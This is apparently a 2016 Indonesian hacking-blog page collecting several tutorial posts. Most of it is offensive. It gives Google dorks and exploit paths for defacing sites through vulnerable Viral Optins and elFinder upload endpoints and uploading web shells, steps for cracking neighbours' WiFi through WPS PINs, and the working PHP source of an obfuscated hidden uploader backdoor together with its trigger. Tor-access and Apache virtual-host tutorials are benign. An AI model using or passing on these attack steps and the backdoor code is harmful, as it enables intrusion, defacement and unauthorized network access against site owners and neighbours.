Senin, 29 Februari 2016

Tutorial Deface Dengan Metode Viral_Optins v2

Hallo fans .-. Nuenomaru disini.
xixihi, wew hari ini tanggal cantik ya :v , yupz tanggal 29 Februari :v
selamat ya yang ulang tahun atau yang aniv :v, selamat selama 4 tahun sekali anda menunggu tanggal ini wkwkkw
cukup2 basabasinya <(")..
Kali ini Nue akan Share Tutorial Deface Dengan Metode Viral_Optins v2
Sebenernya sih ini tutor gak terlalu baru, iseng aja share, kali aja masih crotz wkwkw >.<

Play with me Baby
1. Google Dork : "inurl:/wp-content/plugins/viral-optins/"
(selebihnya kembangin sendiri ya mz, gunakan imajinasi vokever lo, biar dpt yang vuln and verawan)

pilih target lalu masukan exploitnya

exploit: /wp-content/plugins/viral-optins/api/uploader/file-uploader.php

Tanda Vuln = Blank~ xixixhi

vuln gaes ~

Jika sudah ketemu target yang Vuln, langsung aja Copy script CSRF Upload disini: touch me baby ;*


masukan link target web anda ke script CSRF, lalu save dgn ekstensi .html
jika sudah buka dgn browser , lalu upload file yg ingin anda upload.



Akses file : http://target/wp-content/uploads/(tahun)/(bulan)/filemumas

( Hanya bisa upload file gambar dan .txt )


Mudahkan o.O ?

Stay Cool and Keep ./Crotz , gaes :'v

Sekian tutorial sederhana di postingan ringan kali ini xixixhi.
sampai ketemu di next tutorial dgn Nue lagi ;)
xixihi, kali aja ada yg bisa ngembangin, bisa upload shell *klo ada share yak om di komen <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy defaced~
Sekian dan semoga bermanfaat .. terimakasih





source and thanks to: touch me baby ;*







./Nuenomaru






Nuenomaru just an illusion in Cyber World
















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Minggu, 28 Februari 2016

WASPADA KALIAN YANG MEMPUNYAI CHECKER & PHISING ADA HIDDEN UPLOADER

Hallo fans .-. Nuenomaru disini .
cieelah dah lama gak posting, postingan sebelumnya di isi sama si Om OepilCore dan abang Calcune_System.
okeii kalii ini Nuenomaru akan bahas Tentang Script Hidden Uploader & Cara Patch nya .
sebenernya sih kasus web phising milik attacker, dan web checker milik para kardiman yang dari dlu alus2 aja eh tiba2 bisa di deface oleh depeser :v awkakwka.
yupz, itu karna sebagian dari mereka tak menyadari ada Hidden Uploader di web yang mereka buat :3 *entah itu hosting gratisan atau berbayar, tpi disalahsatu script trdapat hidden uploadernya.
cukup pembahasannya ;)

Lanjootz aja gans

apa itu hidden uploader? , hidden uploader adalah uploader tersembunyi. fungsi dari hidden uploader adalah sudah pasti untuk mengupload macam2 file termasuk juga backdoor/shell :D

<?php
if
(isset
(
$_REQUEST[$browser=$x=strlen("Chrome") . strlen("Mozila")]) && 
$_REQUEST[$x=strlen("Chrome") . strlen("Mozila")]=="browser")
{
echo "<h2></h2><hr>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\"></label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br /><br />
<input type=\"submit\" name=\"default\" value=\"Upload\">
</form>";

{
move_uploaded_file($_FILES["file"]["tmp_name"],
"" . $_FILES["file"]["name"]);
echo "Rand(100-100): " . "" . $_FILES["file"]["name"];
echo"<hr>";
}
}
?> 

Cara menggunakan :
1. Copy script diatas.
2. Pastekan ke notepad dan save dengan format .php contoh : "hidden.php" dan simpan di localhost.

3. cara menjalankan script tersebut hidden.php?66=browser

penampakan hidden uploader :3


Lalu gimana cara patch nya x_O ????

penampakan source code sebelum di patch:


Biasanya kode itu oleh si pembuat checker di sisipkan di index.php maupun function.php. Saran saya adalah sebelum mengeshare checker sobat sebaiknya di delet itu hidden uploader soalnya sangat berbahaya! kalau sampek adat angan iseng nah anda lupa backup ancur hidup anda. nah atau dengan cara di patch seperti saya dengan menambahkan kode seperti ini:




Mudahkan o.O ?

Stay Cool and Keep ./Crotz , gaes :'v

Sekian tutorial sederhana di postingan ringan kali ini xixixhi.
sampai ketemu di next tutorial dgn Nue lagi ;)

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy patching~
Sekian dan semoga bermanfaat .. terimakasih




refrensi: touch me senpai :')




./Nuenomaru




Nuenomaru just an illusion in Cyber World




















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Senin, 22 Februari 2016

Tutorial Hack/Bobol Wifi Router

Hai cang,cing,enya,baba, Calcune di mari –
Maaf jarang post ya fans wkwk
Tapi tenang kali ini gue mau ngeshare Tutor hack wifi router di windows atau bahasa kerennya Cara Hack dan Mengetahui Password Wifi WPA-WPA2 di Windows
tutorial ini cucok banget buat yang dirumahnya banyak wifi2 bertebaran milik tetangga :v akawkwakakw , mayan buat ngegame/ngesosmed awkakwawkawk
Langsung intip aja nyok

Siapin software:
1.Jumpstart
2.Dumper
3.Wincap

Download disini:
SolidFiles
4shared
Drive Google
(bila ada salah satu link yang mati, harap lapor dikolom komentar)

Pastikan anda install dahulu Jumpstart nya setelah anda install jumpstart nya
Lalu anda install Wincapnya
Setalah anda install Wincapnya buka Software Dumper nya

Oke Cekidott kita play


Pertama klik scan sampai wifi routernya nongol kaya yg di bawah wkwk



Kemudian anda klik WPS yg ada di menu atasnye :v



Kemudian anda scan, oiya sob jangan lupa pilih dulu SOLO REDES lalu anda klik wifinya sampai nick wifi nya nongol muncul di Essid wifi

Kemudian anda pilih TODAS LAS, lalu anda scan lagi sampai keluar no pin nya


Setelah keluar no pin nya anda klik no pin yang ada di menu sampai muncul di bawah kotak WPS PIN


Kemudian tentukan dulu lokasi dimana anda menyimpan instalasi jumstar kalau sudah klik Iniciar Jumpstart…. Tungguin sampai proses nyaselesai ..Kalau sudah selesai muncul deh password wifi router nya JENG JENGJENG



Sekarang anda bisa cek langsung di wifi windows anda..SUCCESS :v

done ^^

Silahkan nikmati wifi gratiss ;D
Gimana berhasilkan ?!
Mudahkan O.o ? 

Stay Cool and and Keep ./Crotz ,gaes :'v

sampai ketemu sama gue, calcune_system di next tutorial berikutnya, terus pantengin aja ini blog awkakwak.
Bila ada kesalahan langsung aja koment di kolom komen, bila ada saran, pertanyaan, atau kritikan langsung aja ke wall FP kami: TKJ CYBER ART
Happy Hacked~
Semoga bermanfaat ^^




refrensi: galaxymous







./Calcune_System























Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Sabtu, 20 Februari 2016

Tutorial Access Deep Web Menggunakan TOR Browser



Yoo yooo semuanya , kembali lagi bersama saya #OepilCore ,
ohiya maaf ane jarang ngepost kwkwk jadi gak enak ama om nue yang sering ngepost mulu XD , maaf om nue ane kan juga lagi sibuk ngurusin ukom heheh~

oke , kali ini gua bakalan share tentang , cara mengakses deep web , menggunakan Tor Browser pada windows ,
cieee pada kepo kan , pasti kalian pernah denger tentang deep web dan dark net kan ? :3 hayoo ngaku kwkwkw~
mimin udah nyoba buka , dan bener bener nagih .-. karena bener bener ada beberapa article yang bikin mimin tertarik dari hidden wiki , . . .dan intel exchange , karena disini beberapa informasi didapatkan secara illegal dan melalui jalur penggunaan data tertentu :3 , oke gak usah banyak cincongg ,

langsung to the point !!



Oke , untuk kalian para pengguna windows ,
tumben gua share menggunakan windows biasanya lewat backbox Linux kwkwkw~

untuk kalian para pengguna jendela , bisa langsung download tor browser dengan mencari di mbah google , dan pasti bakalan nongol link downloadnya ,

setelah itu kita install seperti biasa ajah bro , gak usah terlalu serius installnya kwkwkw~ ,
setelah di install maka akan muncul shortcut di desktop anda seperti ini , *lihat gambar mas* kwkwkw


oke , lihat kan di desktop ane ? , oke untuk tahap selanjutnya silahkan kalian Start Tor Browser nya ,


dan setelah terbuka kalian klik di Configure ,
maka setelah itu anda akan masuk ke dalam penyetinggan , silahkan lihat gambar ,


disini kalian pilih yes , lalu next


setelah itu Next lagi seperti biasa , dengan settingan bridges configuration defaultnya Tor


dan disini adalah , apakah kalian berminat menggunakan proxy untuk akses ke internet ?
kalo disini ane pilihnya no *aku sih no , kaya mas anang ajah kwkwkw*


dan setelah itu silahkan klik connect , dan tunggu sampai kalian terkonek dan kalian bisa cari link hidden wiki dari mbah google , dan link link yang lainnya ,

dan inilah nampaknya saat ane surf di deep web :3  sengaja di sensor , informasinya rahasia kwkwkw~ *ciellah udah kaya anak sd main rahasia rahasiaan *





okay bagaiamana ? apakah kurang jelas , jika ada yang kurang jelas , mari kita bertanya pada rumput yang bergoyangg kwkwkw~
*note , mimin tidak bertanggung jawab apabila terjadi suatu kejadian atau apapun terhadap kalian , karena mimin hanya share tutor ajah gak lebih kwkwkw~*

oke sekian dulu tutor dari saya #OepilCore
bila ada kesempatan dan info yang dapat saya sampaikan akan saya berikan ^^ , terimakasih
 Stay Cool And Keep Crootzz

Salam Lestari and , pay pay~


OepilCore


















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Tutorial Deface elFinder Shell Upload Vulnerability

Hallo fans, Nuenomaru disini .-.
xixhi, untuk kali ini Nue akan Share Tutorial Exploit elFinder Shell Upload Vulnerability
ini Exploit dah agak lama sih, tapi iseng aja di post, Siapa tau masih crotz awkakwka.
untuk Tutorial Auto exploiter elFinder nya bisa cek dimari -> Auto exploiter elFinder
Udah deh karna Nue capek, baru balik praukom langsung aja deh Simak gans..


Let's Play Bebz <(")

DORK:
inurl:/elfinder/elfinder.php.html
inurl:/elfinder/files/
(kembangin lagi dgn imajinasi kalian, agar dpt yang VULN and Verawan)

Exploit:
http://site.com/[path]/elfinder/elfinder.html 
http://site.com/[path]/elfinder/elfinder.php.html                  
http://site.com/[path]/elfinder/src/elfinder-src.php.html 

Oke langsong aja Dorking di Google , pilih target dan Masukan exploit nya aja satu2.

dan kebetulan ditarget Nue kali ini, Exploitnya terletak di:
www.target.com/elfinder/elfinder.html


Tuh tinggal Upload File/Shell Lo aja :D


nue tuh orgnya gak PHP kok bebz ;v, gimana mau PHP, HTML aja gak ngerti :'v *ppfft

Shell Akses o.O ??
klik kanan di file yg telah di upload, lalu klik get info/klik yang paling bawah


Lalu Klik Deh nama shell agans :3

Atau langsung ke site nya:
http://target.co.li/[path]/elfinder/files/shellkamu.php

Done ^^ ..

Taraaa, Sukses kan ;)
Seterah deh mau diapain, mau di bedah ampe usus2 nya juga ,,,,,,,,,, *eh Dosa xD
Kalau mau nebas indexnya, jgn lupa dibackUp yak, Hargai juga webmasternya mz <(")
Nue cuma Share doang yak, segala sesuatu ditanggung Pengguna ^^


Mudahkan o.O ?
Stay Cool and Keep ./Crotz , gaes :'v

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Defaced ~
Sekian dan semoga bermanfaat .. terimakasih




source and thanks to: United Cyberspace Of Indonesian






./Nuenomaru







Nuenomaru just an illusion in Cyber World

















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Jumat, 19 Februari 2016

Cara Membuat Virtual Host (SubDomain) di Linux Debian & Ubuntu

Hallo fans, Nuenomaru disini .-.
maaf jarang posting akhir2 ini *lg sibuk persiapan Uji Kompetensi Kejuruan mz :'D *curhat
tapii tenang kali ini Nue akan share Tutorial Cara Membuat Virtual Host (SubDomain) di Linux Debian & Ubuntu. karna di Linux Debian dan Ubuntu Cara dan perintah2 nya sama saja, jadi disini nue milih Ubuntu aja utk Live Prakteknya ;) :* . *silahkan dicoba di pinguin2 kesayangan anda :p
Disini Nue akan Membuat Virtual Hostnya dengan Meremote dari PC Client Menggunakan PuTTY (*Remote SSh) Ke PC Server yang terinstal Sistem Operasi Ubuntu.
bagi yang mau mengkonfigurasinya langsung dari Server juga gak apa2 *sama saja kok

Detail:
PC Server: Linux Ubuntu Ver. 12.04 LTS
PC Client:  Windows 7
Remote SSH with PuTTY

apa itu Virtual Host o.O ? Intinya sih adalah cara untuk mengatur banyak URL di dalam satu IP.
Maksudnya adalah anda bisa masuk pada suatu IP tanpa menuliskan IP nya,
anda hanya perlu menuliskan SubDomain IP tersebut yang telah di tambahkan
dan anda bisa menambahkan lebih dari satu SubDomain sehingga dapat
menghemat IP.

Contoh SubDomain : mail.yahoo.com, mail.google.com.

Langsongg saja intip Tutorialnya ;)
Pastikan anda Sudah masuk ke Mode SuperUser ;)
Pertama anda harus membuat konten isi dari SubDomain di dalam folder /var/www. maka dari itu anda harus pindah ke direktory /var/www. dengan perintah #cd /var/www

Jika anda sudah pindah ke direktori /var/www. Sekarang anda tinggal membuat isi SubDomain nya nanti, saya akan membuat folder bernama tkjcyberart. Dengan perintah #mkdir tkjcyberart  
*tkjcyberart bisa anda ubah sesuka anda

Lalu buat file index.html dengan perintah #nano /var/www/tkjcyberart/index.html



Kemudian Nue Isikan Script sebagai berikut:
Script bisa sesuka anda, gunakan imajinasi :v agar tampilannya biar keren , boss <(")


simpan dengan CTRL+X, tekan Y lalu Enter


Kemudian anda pindah ke direktori sites-available untuk mulai mengkonfigurasi VirtualHost. Dengan perintah #cd /etc/apache2/sites-available

Silahkan anda salin file default ke nama SubDomain seperti tkjcyberart.
Dengan perintah #cp default tkjcyberart


Setelah anda menyalin file default kemudian edit. 
dengan perintah #nano tkjcyberart


Lalu tambah beberapa baris konfigurasi seperti gambar berikut.


save dgn CTRL+X, tekan Y , lalu Enter

Jika yang menKonfigurasinya langsung lewat PC Server berOS Linux, sama saja kok:



Keterangan:
  - ServerName : Nama domain.
  - ServerAlias : Nama SubDomain yang akan di jadikan virtual alias.
  - ServerAdmin : Alamat email pemilik domain.

  - DocumentRoot : Tempat pengalihan directori dari Virtual alias yang di buat.

Lalu Aktifkan kan site tkjcyberart. Dengan perintah #a2ensite tkjcyberart




Akan muncul perintah untuk me reload apache2.
      dengan perintah:
     #service apache2 reload
      atau

      #service apache2 force reload


contoh diatas yg keluar adalah service apache2 reload, yupz lalu ketik sesuai perintah

Sekarang anda coba buka di browser PC Client, jika seperti gambar berikut
maka konfigurasi berhasil.




xixihi, Done ^^
gimana, di pinguin2 kesayangan anda ? berhasil kan ?!
awkakw laen kali kita maen PuTTY 'ng Susu lagih ya kakakz <(") awkakakakw
Mudahkan o.O ? Stay Cool and Keep ./Crotz ,gaes :'v




Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami
: TKJ Cyber Art
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Go OpenSource Indonesia~
Sekian dan semoga bermanfaat .. terimakasih




thanks to: ALL FAMILY TKJ Cyber Art



Nuenomaru






Edited By: OepilCore


















Visit and follow :


FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
 

ande ande lumoet Template by Ipietoon Cute Blog Design